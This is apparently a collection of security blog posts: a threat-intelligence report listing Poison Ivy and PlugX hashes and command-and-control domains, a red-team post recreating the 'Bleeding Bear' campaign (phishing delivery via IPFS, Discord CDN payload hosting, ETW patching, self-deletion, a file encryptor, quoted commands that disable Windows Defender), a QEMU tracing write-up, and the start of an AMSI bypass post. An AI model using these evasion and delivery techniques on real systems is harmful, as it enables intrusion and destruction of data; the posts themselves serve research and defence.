adservice.no-ip[.]org adservice.no-ip[.]org 2014-02-18 2014-02-18 2014-02-19 2014-02-19 74.126.177.68 74.126.177.68
java.ns1[.]name java.ns1[.]name 2014-02-18 2014-02-18 2014-02-19 2014-02-19 74.126.177.68 74.126.177.68
java.ns1[.]name java.ns1[.]name 2014-02-18 2014-02-18 2014-02-18 2014-02-18 192.74.246.219 192.74.246.219
wmi.ns01[.]us wmi.ns01[.]us 2014-02-17 2014-02-17 2014-02-17 2014-02-17 192.74.246.219 192.74.246.219
proxy.ddns[.]info proxy.ddns[.]info 2013-05-02 2013-05-02 2014-02-18 2014-02-18 103.246.246.103 103.246.246.103
updatedns.ns02[.]us updatedns.ns02[.]us 2013-09-06 2013-09-06 2013-09-06 2013-09-06 103.246.246.103 103.246.246.103
updatedns.ns01[.]us updatedns.ns01[.]us 2013-09-06 2013-09-06 2013-09-06 2013-09-06 103.246.246.103 103.246.246.103
wmi.ns01[.]us wmi.ns01[.]us 2013-07-04 2013-07-04 2013-07-15 2013-07-15 103.246.246.103 103.246.246.103

 

MD5 Family Compile Time Alternate C2s
7995a9a6a889b914e208eb924e459ebc 7995a9a6a889b914e208eb924e459ebc PlugX PlugX 2012-06-09 2012-06-09 fuckchina.govnb[.]com fuckchina.govnb[.]com
bf60b8d26bc0c94dda2e3471de6ec977 bf60b8d26bc0c94dda2e3471de6ec977 PlugX PlugX 2010-03-15 2010-03-15 microsafes.no-ip[.]org microsafes.no-ip[.]org
fd69793bd63c44bbb22f9c4d46873252 fd69793bd63c44bbb22f9c4d46873252 Poison Ivy Poison Ivy 2013-03-07 2013-03-07 N/A N/A
88b375e3b5c50a3e6c881bc96c926928 88b375e3b5c50a3e6c881bc96c926928 Poison Ivy Poison Ivy 2012-06-11 2012-06-11 N/A N/A
cd07a9e49b1f909e1bd9e39a7a6e56b4 cd07a9e49b1f909e1bd9e39a7a6e56b4 Poison Ivy Poison Ivy 2012-06-11 2012-06-11 N/A N/A

The Poison Ivy variants that connected to the domain wmi.ns01[.]us had the following unique configuration properties:

Domain First Seen Last Seen IP Address
fuckchina.govnb[.]com fuckchina.govnb[.]com 2013-12-11 2013-12-11 2013-12-11 2013-12-11 204.200.222.136 204.200.222.136
microsafes.no-ip[.]org microsafes.no-ip[.]org 2014-02-12 2014-02-12 2014-02-12 2014-02-12 74.126.177.70 74.126.177.70
microsafes.no-ip[.]org microsafes.no-ip[.]org 2013-12-04 2013-12-04 2013-12-04 2013-12-04 74.126.177.241 74.126.177.241

We found a related Poison Ivy sample (MD5 8936c87a08ffa56d19fdb87588e35952) with the same “java7” password, which was dropped by an Adobe Flash exploit (CVE-2012-0779). In this previous incident, visitors to the Center for Defense Information website (www.cdi[.]org — also an organization involved in defense matters — were redirected to an exploit server at 159.54.62.92.

This exploit server hosted a Flash exploit file named BrightBalls.swf (MD5 1ec5141051776ec9092db92050192758). This exploit, in turn, dropped the Poison Ivy variant. In addition to using the same password “java7,” this variant was configured with the mutex with the similar pattern of “YFds*&^ff” and connected to a CnC server at windows.ddns[.]us.

Using passive DNS analysis, we see the domains windows.ddns[.]us and wmi.ns01[.]us both resolved to 76.73.80.188 in mid-2012.

Domain First Seen Last Seen IP Address
wmi.ns01.us wmi.ns01.us 2012-07-07 2012-07-07 2012-09-19 2012-09-19 76.73.80.188 76.73.80.188
windows.ddns.us windows.ddns.us 2012-05-23 2012-05-23 2012-06-10 2012-06-10 76.73.80.188 76.73.80.188

During another earlier compromise of the same www.cdi.org website, visitors were redirected to a Java exploit test.jar (MD5 7d810e3564c4eb95bcb3d11ce191208e). This jar file exploited CVE-2012-0507 and dropped a Poison Ivy payload with the hash (MD5 52aa791a524b61b129344f10b4712f52). This Poison Ivy variant connected to a CnC server at ids.ns01[.]us. The domain ids.ns01[.]us also overlaps with the domain wmi.ns01[.]us on the IP 194.183.224.75.

Domain First Seen Last Seen IP Address
wmi.ns01[.]us wmi.ns01[.]us 2012-07-03 2012-07-03 2012-07-04 2012-07-04 194.183.224.75 194.183.224.75
ids.ns01[.]us ids.ns01[.]us 2012-04-23 2012-04-23 2012-05-18 2012-05-18 194.183.224.75 194.183.224.75

The Poison Ivy sample referenced above (MD5 fd69793bd63c44bbb22f9c4d46873252) was delivered via an exploit chain that began with a redirect from the Center for European Policy Studies (www.ceps[.]be). In this case, visitors were redirected from www.ceps[.]be to a Java exploit hosted on shop.fujifilm[.]be.

In what is certainly not a coincidence, we also observed www.arce[.]org (one of the sites redirecting to the current Flash exploit) also redirect visitors to the Java exploit on shop.fujifilm[.]be in 2013.

greedywonk-campaign-v2

Conclusion

This threat actor clearly seeks out and compromises websites of organizations related to international security policy, defense topics, and other non-profit sociocultural issues. The actor either maintains persistence on these sites for extended periods of time or is able to re-compromise them periodically.

This actor also has early access to a number of zero-day exploits, including Flash and Java, and deploys a variety of malware families on compromised systems. Based on these and other observations, we conclude that this actor has the tradecraft abilities and resources to remain a credible threat in at least the mid-term.

Repurposing Real TTPs for use on Red Team Engagements

7 April 2022 at 09:00

I recently read an interesting article by Elastic. It provides new analysis of a sophisticated, targeted campaign against several organizations. This has been labelled ‘Bleeding Bear’. The articles analysis of Bleeding Bear tactics, techniques and procedures left me with a couple of thoughts. The first was, “hey, I can probably perform some of these techniques!” and the second was, “how can I improve on them?”

With that in mind, I decided to create a proof of concept for elements of Operation Bleeding Bear TTPs. This is not an exact replica, or even an attempt to be an exact replica, because I found a lot of the actions the threat actors were performing were unnecessary for my objectives. I dub this altered set of techniques BreadBear.

Where there are changes, I’ll point them out along with the reasons for them. To help you to follow along with this blog post, I have posted the code to my GitHub repository, which you are welcome to download, examine, and run. This post will be separated into three distinct sections which will mark each stage of the campaign; initial payload delivery, payload execution, and finally document encryption.

Stage 1 – Initial Payload and Delivery

The first section of the Bleeding Bear campaign is described as a WhisperGate MBR wiper. Essentially, this technique will make any machine affected unbootable on the next boot operation. The attackers replace the contents of the MBR with a message that usually says something along the lines of “To get your data back, send crypto currency to xyz address”. I didn’t implement this because it’s a proof of concept and I didn’t want to wreck my development VM 100 times to test this out.

Instead, I created a stage 1 as a fake phishing scenario to be the initial delivery of the payload. The payload itself is delivered via a static webpage that upon loading will execute JavaScript to automatically download the stage 2 payload. However, it’s up to the end user to click past a few different warnings to run the executable. I’d like to mention that initial payload delivery is probably my weakest point in all of this, so if you’re reading this and can think of a million ways to improve upon this technique, please reach out to me on twitter or LinkedIn with recommendations.

The initial payload delivery is facilitated by a static web page with some JavaScript that has the user automatically download the targeted file upon loading of the page. The webpage itself is hosted by IPFS (Inter-Planetary File System). Once you have IPFS installed on your system, all you need to do is import your web-pages root folder to IPFS and retrieve the URL to your files. This process is very simple and looks as follows.

Once IPFS is installed, first hit Import, then Folder.

Graphical user interface, text, application, Teams Description automatically generated

Next, when the browser window opens, you’ll want to browse to your static webpages root folder. A sample provided by Black Hills Information Security is included in the GitHub repo under x64/release. With tools like zphisher you can create your own, more complex, phishing sites.

Once your folder has been imported, your files will be shared via the IPFS peer-to-peer network. Additionally, they will be reachable from a common gateway that you can set in your IPFS settings. IPFS has a list of gateways that can be used, located on this site. However, to retrieve the URL that can access your files you’ll want to right click on the folder, click share link, and then copy.

Graphical user interface, application, Word Description automatically generated

Graphical user interface, application Description automatically generated

Then, all you need to do is distribute this link with the proper context for your target. When the user clicks your link, they’ll be presented with the following page:

Graphical user interface, application, Word Description automatically generated

On Chrome, if they press keep, the file finishes the download and is ready for execution. The JavaScript code that performs the automatic download to force Chrome to ask to keep the file is shown below:

Text Description automatically generated

An element variable is initialized to the download href tag. Then, we set the element to our executable file named MicrosoftUpdater.exe. Finally, we click the element programmatically which starts the download process. For more information about how IPFS can be used as a malware hosting service, read this blog by Steve Borosh who was the inspiration of the initial payload delivery.

Stage 2 – Payload Execution

Once the user has been successfully phished, phase 1 has been completed and we transition into phase 2, with the execution of stage2.exe or, in this case, the MicrosoftUpdater.exe program. In the Bleeding Bear campaign, the heavy lifting is performed by the stage2.exe binary, which uses Discord to download and execute malicious programs. My stage 2 binary also utilizes the Discord CDN to download, reflectively load, and execute stage 3. However, that’s pretty much where the comparison stops.

The stage 2 Discord downloader in the Bleeding Bear campaign downloads an obfuscated .NET assembly and uses reflection to load it. However, mine is a compiled PE binary. Additionally, the Bleeding Bear campaign performs a lot of operations which require either a UAC bypass or a UAC accept from the user to perform. These actions include writing a VBScript payload to disk which will set a Defender exclusion path on the C drive.
"C:\Windows\System32\WScript.exe""C:\Users\jim\AppData\Local\Temp\Nmddfrqqrbyjeygggda.vbs"
powershell.exe Set-MpPreference -ExclusionPath 'C:\'

Then the payload will download and run AdvancedRun in a higher integrity to stop Windows Defender and delete all files in the Windows Defender directory.

"C:\Users\jim\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\sc.exe" `
/WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run
"C:\Users\jim\AppData\Local\Temp\AdvancedRun.exe" `
/EXEFilename "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 `
/CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" `
/StartDirectory "" /RunAs 8 /Run

Next, InstallUtil.exe is downloaded to the user’s Temp directory. The InstallUtil program is used for process hollowing. This means that the executable is started in a suspended state, then the memory of the process is overwritten with a malicious payload which is then executed instead. To the computer, it will look like InstallUtil is running, however, it is actually the payload. In the Bleeding Bear campaign, that malicious payload happens to be a File Corruptor, which overwrites 1MB of the byte 0xCC over all files that end with the following extensions:

.3DM .3DS .602 .7Z .ACCDB .AI .ARC .ASC .ASM .ASP .ASPX .BACKUP .BAK .BAT .BMP .BRD .BZ .BZ2 .C .CGM .CLASS .CMD .CONFIG .CPP .CRT .CS .CSR .CSV .DB .DBF .DCH .DER .DIF .DIP .DJVU.SH .DOC .DOCB .DOCM .DOCX .DOT .DOTM .DOTX .DWG .EDB .EML .FRM .GIF .GO .GZ .H .HDD .HTM .HTML .HWP .IBD .INC .INI .ISO .JAR .JAVA .JPEG .JPG .JS .JSP .KDBX .KEY .LAY .LAY6 .LDF .LOG .MAX .MDB .MDF .MML .MSG .MYD .MYI .NEF .NVRAM .ODB .ODG .ODP .ODS .ODT .OGG .ONETOC2 .OST .OTG .OTP .OTS .OTT .P12 .PAQ .PAS .PDF .PEM .PFX .PHP .PHP3 .PHP4 .PHP5 .PHP6 .PHP7 .PHPS .PHTML .PL .PNG .POT .POTM .POTX .PPAM .PPK .PPS .PPSM .PPSX .PPT .PPTM .PPTX .PS1 .PSD .PST .PY .RAR .RAW .RB .RTF .SAV .SCH .SHTML .SLDM .SLDX .SLK .SLN .SNT .SQ3 .SQL .SQLITE3 .SQLITEDB .STC .STD .STI .STW .SUO .SVG .SXC .SXD .SXI .SXM .SXW .TAR .TBK .TGZ .TIF .TIFF .TXT .UOP .UOT .VB .VBS .VCD .VDI .VHD .VMDK .VMEM .VMSD .VMSN .VMSS .VMTM .VMTX .VMX .VMXF .VSD .VSDX .VSWP .WAR .WB2 .WK1 .WKS .XHTML .XLC .XLM .XLS .XLSB .XLSM .XLSX .XLT .XLTM .XLTX .XLW .YML .ZIP

I found a lot of these steps to be unnecessary; therefore, I did not perform them. I wanted to leave as minimal trace on the system as possible. I also didn’t see a need for a high integrity process to be spawned to perform ancillary functions, such as deleting Windows Defender, when we can just bypass it. However, my stage 2 code does contain a failed UAC bypass even though it is not used.

The differences between my stage 2/3 will become apparent as we walk through the code. Before we start walking through the code, I’d like to mention the features of my stage 2 so that when you see auxiliary function names through the code – it’ll make sense. My stage 2 does the following:

  • Dynamically retrieves function pointers to any Windows APIs used maliciously
    • Has a custom GetProcAddress() & GetModuleHandle() implementation to retrieve function calls
    • Custom LoadLibrary() function that will dynamically retrieve the pointer to LoadLibraryW() at each run.
  • Hides the console window at startup.
  • Has a self-delete function which will delete the file on disk at runtime once the PE has been loaded into memory and executed.
  • Unhooks DLLs using the system calls for native windows APIs (using the Halo’s Gate technique).
  • Disables Event Tracing for Windows (ETW).
  • Uses a simple XOR decrypt function to decrypt strings such as Discord CDN URLs at runtime.
  • Performs a web request to Discord CDN using Windows APIs to retrieve stage3 in a base64 encoded format.
  • Reflectively loads a stage 3 payload in memory and executes.
  • Lazy attempts at string obfuscation.

With that said, I will only cover techniques I found particularly interesting or important in this blog post for brevity.

A picture containing text Description automatically generated

First, we see a dynamically resolved ShowWindow() used to hide the window. Next, we see SelfDelete() which will delete itself from disk even if the executable is running still. I believe this function is a neat trick and worth going over.

A picture containing text Description automatically generated

First, we dynamically resolve pointers to the Windows APIs CloseHandle(), SetFileInformationByHandle(), CreateFileW(), and GetModuleFileNameW(). Following that we create some variables to store necessary information.

Text Description automatically generated

Next, we resolve the path that our stage 2 is downloaded to disk using GetModuleFileNameW(). We then obtain a handle to stage 2 using CreateFileW() and the OPEN_EXISTING flag. We create a FILE_RENAME_INFO structure and populate its contents with the rename string “:breadman” and a flag to replace the file if it exists already. We make a call to setFileInformationByHandle() using our file handle, our rename information structure, and the FileRenameInfo() flag. This renaming of the file handle will allow us to delete the file on disk. This is because the file lock occurs on the renamed file handle. We can then reopen a file handle to the original file on disk and delete it. Thus, we close our handle and reopen it using the original filename path. After, we call SetFileInformationByHandle() again with a File Disposition Info structure and the DeleteFileW() flag set to true. Finally, we close our file handle, which will cause the file to be deleted from disk and we continue our code execution back in main.

With that done, we perform the unhooking of our DLLs using System Calls and Native APIs to bypass AV/EDR hooking. I won’t cover this in depth, however, the same exact code is used in another of my blog posts.

The next important functions in main() are disabling event tracing for windows and decrypting the encrypted Discord CDN strings.

Text Description automatically generated

The disabling of event tracing for windows is simple (function template credits to Sektor7 institute):

Text Description automatically generated

First, we obtain a handle to the function EventWrite() in the NTDLL.dll library. Then we change the memory protections of a single page to execute+read+write, copy in the byte equivalent to xor rax,rax ; ret at the first four bytes. This will eventually set the return value of the function to zero (probably indicating success) and then returning. The function essentially returns without performing any actions, and therefore disables event tracing for windows.

I won’t go over the XOR decryption since it’s a rudimentary technique. However, I will go over how you can use Discord CDN as a MDN ‘Malware Distribution Network’.

In Discord, anyone can create their own private server to upload files, messages, pictures, etc. to. However, access to anything uploaded, even to a private server, does not require authentication. One caveat to keep in mind, however, is that executables need to be converted to a base64 string. When I downloaded them manually from the CDN, I ran into problems (likely compression) where the size was smaller when I downloaded it using APIs. The same problem did not occur with text files. Therefore, I put the base64 encoded PE file into a text file and downloaded that instead. This looks like the following:

Graphical user interface, text, application Description automatically generated

Once you’ve uploaded the file, you can right click the download link at the bottom of the above screenshot, then select Copy Link.

Graphical user interface, text, application, website Description automatically generated

Once that has been completed, you have your Discord CDN URL that is accessible from anywhere in the world without authentication. Additionally, these URLs are valid forever even if the file has been deleted from the server.

It’s as simple as that. Obviously, there might be some red team infrastructure you’d want to standup in-between the CDN and the target host to redirect any potential security analysts who go snooping, but it’s an effective method for serving up malware.

Next, to finish up main(), we perform the following tasks. We first parse our Discord CDN URL that was just decrypted into separate parts. Then we perform a request to download our targeted file by calling the do_request() function using the parsed URL pieces.

Text Description automatically generated

We open the do_request() function by dynamically resolving pointers to any Windows APIs we will use to perform the HTTPS request to Discord. We then follow that up by initializing variables we’re going to use as parameters to the following WinInet function calls.

Graphical user interface, text Description automatically generated

There aren’t too many interesting pieces of information regarding our Internet API calls, aside from the InternetOpenA() and the HttpOpenRequestA() calls. For the first, we specify INTERNET_OPEN_TYPE_DIRECT to ensure that there is no proxy. We can put default options here to specify the default system proxy settings. Additionally, for HttpOpenRequestA() we specify the INTERNET_FLAG_NO_CACHE_WRITE flag to ensure the call doesn’t cache the file download in the %LocalAppData%\Microsoft\Windows\INetCache. Next, we make a call to HttpQueryInfoA() with the HTTP_QUERY_CUSTOM flag. This ensures that we can receive the value of a custom HTTP Response header that we got back when we made our HTTP request. The specified custom query header is passed to do_request() from main and is the content length header. We will use this value to allocate memory for our stage 3 payload that was just downloaded.

Text Description automatically generated

We now allocate memory for our downloaded file using malloc() and the size of our content length value. Following that, we make a call to InternetReadFile() function to load the base64 encoded data into our allocated memory space. Once it has been successfully loaded, we make a call to pCryptStringToBinaryW(), which will convert our base64 encoded data into the byte code that makes up our stage 3 payload. We then free the allocated memory region and call the final function of do_request() which is reflectiveLoader().

Text Description automatically generated

I won’t go over the reflective loading / execution of our PE File in memory because I’ve written a previous blog post about it already. However, I used the code from this resource as the base of my loader.

Stage 3 – File Corruptor

Stage 3 probably has the biggest differences in functionality from the Bleeding Bear campaign. The stage 3 of the Bleeding Bear campaign is a “File Corruptor”, and not an encryption scheme. What this means is that the Bleeding Bear campaign’s third stage will overwrite the first 1mb of data of all files it finds on disk that are not critical to system operation. If the file is smaller than 1mb of data, it will overwrite the whole file and add the difference to make a 1mb file. As far as I know, the campaign does not download the unaffected files before overwriting, therefore all data will be lost. This file corruptor is also not a reflectively loaded PE file. Instead, the file corruptor is likely a piece of shellcode that is executed via a process hollowing technique. The stage 2 of the Bleeding Bear campaign downloads InstallUtil.exe to disk, executes it in a suspended state, overwrites the process memory to the corruptor shellcode, and then resumes the process execution.

The BreadBear technique uses a file encryptor rather than a corruptor. I decided to use an encryptor because eventually I plan to add the functionality of downloading the unencrypted data, the keys used to encrypt the file, and to add a decryption function. I believe this would be beneficial to clients who want to test against a simulated ransomware campaign. Additionally, since I am reflectively loading the stage 3 executable in memory, there’s no need to perform process hollowing, or even writing the InstallUtil binary to disk. I believe my approach is more operationally secure than the Bleeding Bear’s alternative.

Additionally, with my approach you can swap out your stage 3 from file encryptor to implant shellcode. I have successfully tested my stage 3 payload with the binary from my previous blog post BreadMan Module Stomping. The only requirement for the reflective loading is that the file chosen is compiled in a valid PE format.

With that being said, let’s dive into stage 3: the file encryptor.

I would like to note that no attempts at obfuscation or evasion were made in the stage 3 payload. This is because it is being loaded into a process memory space that was unhooked from AV/EDR, and ETW patching have already occurred, so it is not needed.

Text Description automatically generated

In main(), all we do is call the encryptDirectory() function with the argument of our target directory. Note, that since this is a proof of concept, I did not implement functionality to encrypt entire drives.

encryptDirectory() starts by initializing a variable to hold a new directory path called tmpDirectory(). We add the portion “\\*” to our target directory which will indicate we want to retrieve all files. Then, we initialize a WIN32_FIND_DATAW and a file handle variable.

Text Description automatically generated

Next, we call FindFirstFileW() using the target directory and our FIND_DATAW variables as parameters. Then, we create a linked list of directories.

To follow that up, we enter a do-while loop, which continues while we have more directories or files to encrypt in our current directory. We initialize two more file directory path variables. The tmp2 variable stores the name of the next file/directory we need to traverse/encrypt, and the tmp3 variable stores the randomized encrypted file name after the file has been encrypted. Next, we check if the object we obtained a handle to is a directory and if it is the current or previous directory, ‘.’, or ‘..’. If it is, we skip them.

If it’s any other directory, we append the name of that directory to the current directory, add it as a node to our linked list, and continue. If it’s a file, we generate a random string, append that string to the current directory path, and call encryptFile(). This function takes the following parameters: the full path to the unencrypted file, the full path name of the encrypted file, and the password used to encrypt. We then call DeleteFile() on the unencrypted file. Finally, we obtain a handle to the next file in the folder.

Text Description automatically generated

To finish the function off, we recursively call encryptDirectory() until there are no more folders in the linked list of folders we identified.

Text Description automatically generated

I won’t dive too deep into the file encryption function for two reasons. First, I am not a big cryptography guy. I don’t know much about it, and I don’t want to give any false information. Second, I took this proof of concept and just implemented it in C instead of CPP.

However, the important part I’d like to highlight is that I used the same determination scheme the Bleeding Bear campaign uses to ascertain if a file should be corrupted or not. BreadBear and Bleeding Bear both use the following file extension list to determine if a file should be altered:

Text Description automatically generated

Conclusion

With BreadBear, I took an analysis of a real threat actors TTPs and created a working proof of concept, which I believe improves upon some of their tooling. This work can help organizations visualize how a campaign can be easily created and defend accordingly. More importantly, it was an educational exercise. Feel free to contribute to the code base over on GitHub.

The post Repurposing Real TTPs for use on Red Team Engagements appeared first on Nettitude Labs.

QEMU and U: Whole-system tracing with QEMU customization

15 April 2021 at 18:06

Introduction

QEMU is a key tool for anyone searching for bugs in diverse places. Besides just opening the doors to expensive or opaque platforms, QEMU has several internal tools available to enable developer’s further insight and control. Researchers comfortable modifying QEMU have access to powerful inspection capabilities. We will walk through a recent custom addition to QEMU to highlight some helpful internal tools and demonstrate the power of a hackable emulator.

The target was a SoC that had an interesting system spread across multiple processes and libraries. We could communicate with this system from the external network, and we wanted to know the extent of our reach before authentication. Because of the design of the system, it was not simple to track down all the places our influence reached without valid credentials. A better map of that surface area would be helpful for further findings. We had done the prior work to get the target up and running in QEMU, so why not just have the emulator tell us?

Tracing in QEMU

Tracing guest execution in QEMU is not as simple as calling printf(“%p\n”, pc); for every instruction. The thing that puts the Q in QEMU is the TCG. The TCG (Tiny Code Generator) is a just in time compiler that will translate blocks of guest instructions to code that can run on the host. While it would be simple to trace each new block translated, once they are translated the blocks can run multiple times unimpeded and untracked by QEMU code. If all that is needed is a trace of when each block is translated, there is built-in tracing in QEMU that can give that information. (The event is translate_block. See the docs for more details.)

Once a block is translated, the emitted code may be used and reused many times. For our target we wanted to be able to start our trace when the system was in a steady state, when many blocks would have already been translated. If we want to trace every time some basic block is executed in the guest, we need to emit our own operations in front of the rest of the translated block.

There are lots of great references we can turn to for emitting custom operations alongside the translated code. QEMU itself can place instructions before each basic block that are used to count the number of instructions executed. We can follow the call to get_tb_start here in translator.c, which leads here. Operations to check the instruction count are added so execution can be halted if a limit is reached.

/*...*/
    tcg_gen_ld_i32(count, cpu_env,
                   offsetof(ArchCPU, neg.icount_decr.u32) -
                   offsetof(ArchCPU, env));

    if (tb_cflags(tb) & CF_USE_ICOUNT) {
        /*
         * We emit a sub with a dummy immediate argument. Keep the insn index
         * of the sub so that we later (when we know the actual insn count)
         * can update the argument with the actual insn count.
         */
        tcg_gen_sub_i32(count, count, tcg_constant_i32(0));
        icount_start_insn = tcg_last_op();
    }

    tcg_gen_brcondi_i32(TCG_COND_LT, count, 0, tcg_ctx->exitreq_label);

The piece of gen_tb_start emitting the conditional branch

Thankfully, we do not have to specify individual operations like the icount code does. To simplify things, QEMU can generate “helper” functions which will generate operations to call out to a native function from within the translated blocks. This is what AFL++’s fork of qemu uses for its tracing instrumentation without having to modify the guest binary. AFL++’s qemu has to track unique paths taken, and the code makes for a good example for our use case. The In the AFL++ fork, the function afl_gen_trace is called immediately before a basic block is translated.

tcg_ctx->cpu = env_cpu(env);
    afl_gen_trace(pc);
    gen_intermediate_code(cpu, tb, max_insns);

In tb_gen_code where afl emits operations to trace execution

They there call gen_helper_afl_maybe_log, but searching the source we can find no definition for that function. This is a helper function. The build system will create a definition that will emit operations to perform a call to the function HELPER(afl_maybe_log).

void HELPER(afl_maybe_log)(target_ulong cur_loc) {

  register uintptr_t afl_idx = cur_loc ^ afl_prev_loc;

  INC_AFL_AREA(afl_idx);

  afl_prev_loc = cur_loc >> 1;

}

AFL++'s trace helper, adjusting a map in shared memory

The function was declared here as DEF_HELPER_FLAGS_1(afl_maybe_log, TCG_CALL_NO_RWG, void, t1). QEMU’s build system will handle generating the code to create TCG operations to call the helper function. The “_1” indicates it takes one argument, and the last two arguments to the macro are the return type, and the argument type. tl indicates target_ulong. Another helpful argument type is env which passes an CPUArchState * argument to the helper function. ptr, i64, f32, and such all do what they say on the tin.

For our tool, we used a helper function to call to call out at the beginning of every code block. In target/arm/translate.c we added gen_helper_bb_enter(cpu_env, tcg_constant_i32(4)) in the function arm_tr_tb_start which is called at the beginning of translating every block for an ARM guest. This will generate code for each basic block that will call our function HELPER(bb_enter).

This leads us to another problem we encounter when trying to trace such a complex system. On our target, if we implement HELPER(bb_enter) with fprintf(logfile, “@%p\n”, env->regs[15]) we are quickly going to slow our emulator to a crawl, and be left with huge unreasonable files. In our case, we did not care too much about the order in which these basic blocks were hit, we just cared what basic blocks were uniquely hit when we interact with the system over the network. For this we implemented a form of Differential Debugging.

We had to communicate to QEMU when to start and stop a trace, so we could take separate recordings. A recording of area covered while running the system without interacting with it over the network, and a separate recording of lots of various non-authenticated interaction with the system over the network. We then found the area covered in the second recording that was not covered in the first. Then we had our tool report this as surface area to be further tested and reviewed for vulnerabilities.

To do this we implemented the tracing as a bitmap of the address space we cared about. We adjusted the granularity of our map so that every entry accounted for 0x10 bytes of code, which for our 32-bit arm target produced perfectly manageable file sizes.

// paddr to start watching
#define MAP_START_PADDR 0x80000000
// size of memory region
#define MAP_SIZE        0x20000000
#define MAP_END_PADDR   (MAP_START_PADDR + MAP_SIZE)
#define MAP_GRAN_SHF    4   // 0x10 granularity

#define INDX_OFF        (MAP_START_PADDR >> MAP_GRAN_SHF)
#define BB_MAP_INDEX(addr)  ((addr - INDX_OFF) >> 3)
#define BB_MAP_BIT(addr)    (addr & ((1<<3)-1))

unsigned char bb_map[(MAP_SIZE >> (MAP_GRAN_SHF + 3))];
void HELPER(bb_enter)(CPUARMState *env, int blksz)
{
    /* ... */
    pend = pstart + blksz - 1;

    if ((pstart < MAP_START_PADDR) || (pstart >= MAP_END_PADDR)) {
        // not in region
        return;
    }

    if (pend >= MAP_END_PADDR) {
        pend = MAP_END_PADDR-1;
    }

    pstart >>= MAP_GRAN_SHF;
    pend >>= MAP_GRAN_SHF;

    while (pstart <= pend) {
        bb_map[BB_MAP_INDEX(pstart)] |= (1 << BB_MAP_BIT(pstart));
        pstart++;
    }

    return;
}

Piece of relevant code for implementing our tracing bitmap

We also had to add some method to communicate to our emulator when to start, stop, clear, or write out a coverage map. QEMU provides a nice way to implement commands such as these in its HMP (human monitor) system. The documentation contains instructions on how to add monitor commands. The basic process involves adding an entry in the hmp-commands.hx file describing the command names, the arguments expected, and a bit of info about the command. The handler declarations can go in include/monitor/hmp.h, and the definitions typically go in monitor/hmp-cmds.c.

We implemented a clear, start, stop, and write command for our tracing.

For many targets this would be enough, and we could move on to writing tooling to convert our coverage information to file offsets. The system we wanted to gather info on was running in usermode code across multiple processes on our target. If we had logged based on the instruction pointer, we would have a trace of virtual addresses across all processes. Most of these virtual addresses are not going to be unique across processes, rendering our system coverage mostly meaningless.

We got around this issue with a bit of a hack. By translating the virtual address of the instruction pointer to a physical address, we can avoid aliasing between processes. This works for the system we were testing because the relevant processes all remained running the whole time. For an extra measure we turned swap off, keeping our pages from moving around underneath us.

This is probably not a Good Idea™ for most tracing use cases, but it worked well for our setup and we were able to implement it quickly. We made use of a function in QEMU called get_phys_addr that exists for ARM targets. We probably would have been better off using something that made use of the TLB, as the constant translation slowed down the emulator noticeably when our tracing was enabled.

/*...*/
    target_ulong start;
    hwaddr pstart;
    hwaddr pend;
    MemTxAttrs attrs = { 0 };
    int prot = 0;
    target_ulong page_size = { 0 };
    ARMMMUFaultInfo fi = { 0 };
    ARMCacheAttrs cacheattrs = { 0 };

    start = env->regs[15];
    // convert to physical address

    // >:|
    // returns bool, but 0 means success
    if (get_phys_addr(
                    env,
                    start,
                    MMU_INST_FETCH,
                    arm_mmu_idx(env),
                    &pstart,
                    &attrs,
                    &prot,
                    &page_size,
                    &fi,
                    &cacheattrs
    )) {
        printf("DBG Could not get phys addr for %x\n", start);
        return;
    }

Our call to get_phys_addr to translate the instruction pointer into a physical address

To work with physical addresses, we confined our coverage map to the part of the physical address space that we knew was correlated with RAM. Before and after obtaining our two coverage recordings we took physical memory dumps of our system using the existing QEMU monitor command pmemsave. To parse the coverage date for unique coverage, we made a small script that evaluated the dumps, the coverage maps, and any relevant binary files. Upon finding bits in the bitmap that are unique to the second recording, the script checks if the memory dumps show this to be in one of the relevant binary files. We cannot do exact matching on the binary files because relocations will have changed the contents, so we simply align the text section and check if it is “near enough” a match. With a good threshold for “near enough” we obtained accurate results. From there we translated the unique bit locations to file offsets and generate coverage data that could be used with IDA, Binary Ninja, or Ghidra.

(Lighthouse is our favorite coverage plugin for IDA and Binary Ninja. Dragon Dance is a good alternative for Ghidra. Lighthouse’s modoff format is very simple to implement. If coverage compatible with Dragon Dance is needed, the drcov format is simple enough to implement, and Qiling framework has some good example code for generating it.)

Conclusion

This solution worked well for our target and gave us some areas to dig into that would have otherwise been difficult to find quickly. The purpose of this post is not to introduce some new fork of QEMU with this tool built in. There are already too many unmaintained forks of QEMU for vulnerability research, and this tool would be a lot less effective in other situations. This is meant as more of a love note to QEMU, and hopefully inspires other researchers to make better use of their favorite emulator. The internals of QEMU made so our tracing tool could be developed quickly, and we could return focus to finding vulnerabilities.

Heap-based AMSI bypass for MS Excel VBA and others

By: Dan
19 July 2019 at 12:03

This blog post describes how to bypass Microsoft's AMSI (Antimalware Scan Interface) in Excel using VBA (Visual Basic for Applications). In contrast to other bypasses this approach does not use hardcoded offsets or opcodes but identifies crucial data on the heap and modifies it. The idea of an heap-based bypass has been mentioned by other researchers before but at the time of writing this article no public PoC was available. This blog post will provide the reader with some insights into the AMSI implementation and a generic way to bypass it.


Introduction

Since Microsoft rolled out their AMSI implementation many writeups about bypassing the implemented mechanism have been released. Code White regularly conducts Red Team scenarios where phishing plays a great role. Phishing is often related to MS Office, in detail to malicious scripts written in VBA. As per Microsoft AMSI also covers VBA code placed into MS Office documents. This fact motivated some research performed earlier this year. It has been evaluated if and how AMSI can be defeated in an MS Office Excel environment.

In the past several different approaches have been published to bypass AMSI. The following links contain information which were used as inspiration or reference:


The first article from the list above also mentions a heap-based approach. Independent from that writeup, Code White's approach used exactly that idea. During the time of writing this article there was no code publicly available which implements this idea. This was another motivation to write this blog post. Porting the bypass to MS Excel/VBA revealed some nice challenges which were to be solved. The following chapters show the evolution of Code White's implementation in a chronological way:

  • Implementing our own AMSI Client in C to have a debugging platform
  • Understanding how the AMSI API works
  • Bypassing AMSI in our own client
  • Porting this approach to VBA
  • Improving the bypass
  • Improving the bypass - making it production-ready

Implementing our own AMSI Client

